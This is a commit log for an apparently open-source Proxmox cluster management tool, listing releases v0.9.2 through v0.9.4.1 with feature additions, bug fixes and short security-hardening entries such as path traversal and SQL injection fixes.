- fix: setReconfigureCluster prop missing in sidebar (PR #261, newtscamander2)
- fix: OIDC skip JWT verification not persisted (#188)
- fix: list view table too wide in modern layout
- security: timing-safe auth key, TOTP rate limit, absolute session timeout
- security: admin pw change revokes all sessions, plugin path traversal fix
- security: file upload magic bytes, API token escalation fix, DB key permissions
2026-04-06 22:55:56 +02:00
mkellermann97
ae08fc0a86 v0.9.4.1 — Bug Fixes, RBAC, Cross-Cluster Improvements
- ESXi migration: datastore detection from pyvmomi, pvesm path validation (#222, #244, #251)
- Cross-cluster migration: per-NIC bridge + per-storage mapping (#242)
- Cross-cluster replication: proper error handling, efidisk/tpmstate support (#192)
- SSL verification: use system CA store for custom CAs (#246)
- Reverse proxy: SSH WebSocket route fix, VNC reconnect (#221)
- RBAC: VM ACL users can see clusters without cluster.view (#248)
- Replication job creation fix (#241)
- LDAP/OIDC password form replaced with info message (#164)
- Site recovery: full network mapping instead of first value only
2026-04-02 20:38:28 +02:00
mkellermann97
f8c12d548e v0.9.4 — Network View, Light Mode, Security Hardening
Features:
- Network View in Corporate Layout sidebar (bridges, SDN, per-node VM mapping)
- Custom bind address for reverse proxy on different host (#212)
- OIDC JWT verification toggle for broken JWKS environments
- Corporate Layout light mode improvements
- Language picker dropdown for Corporate Layout (#236)
- Community plugin: proxmox-ha (#226)
- Spanish translations update (#234)

Fixes:
- Cross-cluster replication storage mapping (#192)
- Site recovery stuck plans + race conditions (#238)
- Container/local disk migration with multiple storages
- Guest agent log spam when QEMU agent disabled (#237)
- BG image upload behind reverse proxy (#210)
- Topology diagram layout stability
- PBS cluster filtering (#142)
- Datastore usage mismatch sidebar vs tab (#201)
- Node shell letter-spacing in Corporate Layout
- Chevron icon rotation in Corporate node cards

Security:
- SQL injection whitelist for cluster field updates
- File upload path traversal + null byte hardening
- Cluster credentials endpoint access control
- Error message leak prevention (14 endpoints)
- Permission template fixes (5 undefined permissions)
2026-03-29 22:17:31 +02:00
MrMasterbay
60cee9e3e7 fix: user wipe on restart, SR crash handler, CVE trixie fallback (#224, #225)
- CRITICAL: _migrate_from_legacy() wiped all users when OIDC/LDAP user
  had empty password_salt — now only checks local auth users (#224)
- site recovery: wrap all greenlet spawns with crash handler so plans
  don't stay stuck at 'running' if background task throws (#225)
- CVE scanner: suite detection fallback for PVE 9 Trixie + bookworm
  retry when debsecan returns empty on mixed clusters
- version bump to v0.9.3.1
2026-03-25 20:33:33 +01:00
mkellermann97
67e7004271 v0.9.3: plugin system, balancing tolerance, 15 bug fixes, 8 features
Features:
- Plugin system: auto-discover, enable/disable at runtime, plugin API
- Pool exclusion from auto-balancing (like VM/node exclusion)
- Migration tolerance/hysteresis + 15min VM cooldown (anti-ping-pong)
- Storage cluster tolerance (per-storage deadband)
- CVE scanner PNG + PDF export
- Backup schedule editing (#207)
- Custom role editing with name persistence (#167)
- Reverse proxy WebSocket port reuse for VNC/SSH (PR #173)

Bug Fixes:
- Cross-cluster replication: clone used target storage on source cluster (#192)
- CVE scanner fails on failover node — wrong IP from _get_node_ip (#199)
- SMBIOS status-all: skip offline nodes, bulk IP, retries=1 (#198)
- PBS VM backups not showing — volid path format for linked PBS (#143)
- Login background upload 403 behind reverse proxy — CSRF check (#210)
- Rolling update log vanishes during node reboot (#179)
- Rolling update confirmation wrong node count (#180)
- Migration false failure on WARNINGS exit status (#184)
- Ceph panel not rendering on PVE 9 + Ceph Squid (#191)
- OIDC PKCE support for Authentik (#188)
- Support bundle OOM on large log dirs — deque for tail
- Custom role name not persisted — name/ID conflation
- Cluster icon stays Database when offline
- Corporate overview Cluster Storage: sum shared + local datastores
- nginx.conf: correct WebSocket URL patterns for VNC/SSH

Other:
- @FernandoRD added to About credits (Portuguese)
- Site recovery: 8 missing audit log operations added
- VNC cert hints hidden when reverse proxy active
2026-03-22 21:38:41 +01:00
MrMasterbay
c79a696203 fix: show sponsor section in Corporate Layout + bump to v0.9.2.2
- remove isCorporate hidden conditional from sponsor footer
- sponsor section now always visible in both Modern and Corporate layout
- version bump 0.9.2.1 -> 0.9.2.2
2026-03-20 18:42:41 +01:00
MrMasterbay
ef02a0e9b3 chore: bump version to v0.9.2.1
- version bump across constants.py, constants.js, version.json, README, debian/changelog
- add changelog_0921 with 20 fix/feature entries to version.json
2026-03-20 18:19:45 +01:00
MrMasterbay
1917c6c64d fix: PBS backups, rolling update status, support logs, CDN hashes, audit gaps, UI fixes (#143, #170, #172, #178, #182, #183, #184, #190)
- fix PBS snapshots: server-side group filter to avoid fetching all
  snapshots on large datastores, re-fetch on group click (#143)
- fix VM backups tab: add useEffect to fetch when tab selected (#143)
- fix placeholder text contrast: #6B7280 -> #9CA3AF for dark themes (#170)
- fix update crash: add site_recovery.py, esxi_cluster.py to
  version.json update_files list (#172)
- fix rolling update log: phase name apt_upgrade -> apt_dist_upgrade (#178)
- fix support zip: collect per-cluster logs from logs/ dir, redact
  passwords/tokens/IPs from all log output (#182)
- fix rolling update status: auto-invalidate localStorage cache when
  update completes/fails/cancelled (#183)
- fix migration false failure: accept WARNINGS exitstatus as success
  in _wait_for_task (#184)
- fix Top Resources click: navigate to VM detail view instead of
  just highlighting (#190)
- fix auto-failover toggle: use .toggle-switch CSS class instead of
  broken Tailwind utility classes
- pin CDN versions (React 18.3.1, Babel 7.29.2, Chart.js 4.5.1) to
  prevent SRI hash mismatches on jsdelivr updates
- add audit logging to 8 missing site recovery operations (plan
  update, VM add/update/remove, cancel, test cleanup)
2026-03-20 13:25:51 +01:00
MrMasterbay
7d4e609396 v0.9.2: site recovery, XCP-ng, Docker GHCR, cross-hypervisor migration
- Site recovery with granular RBAC (view/manage/failover permissions)
- XCP-ng / XAPI integration (pool management, VM lifecycle, snapshots)
- Cross-hypervisor VM migration (ESXi <-> Proxmox <-> XCP-ng)
- Docker one-liner: multi-arch GHCR images (amd64 + arm64)
- docker-compose.yml for quick deployment
- Corporate layout overhaul
- Customizable login screen background
- Spanish translation (@ColombianJoker)
- Docker healthcheck fix (dedicated /api/health endpoint)
- CSRF origin validation fix behind reverse proxy
2026-03-16 08:59:55 +01:00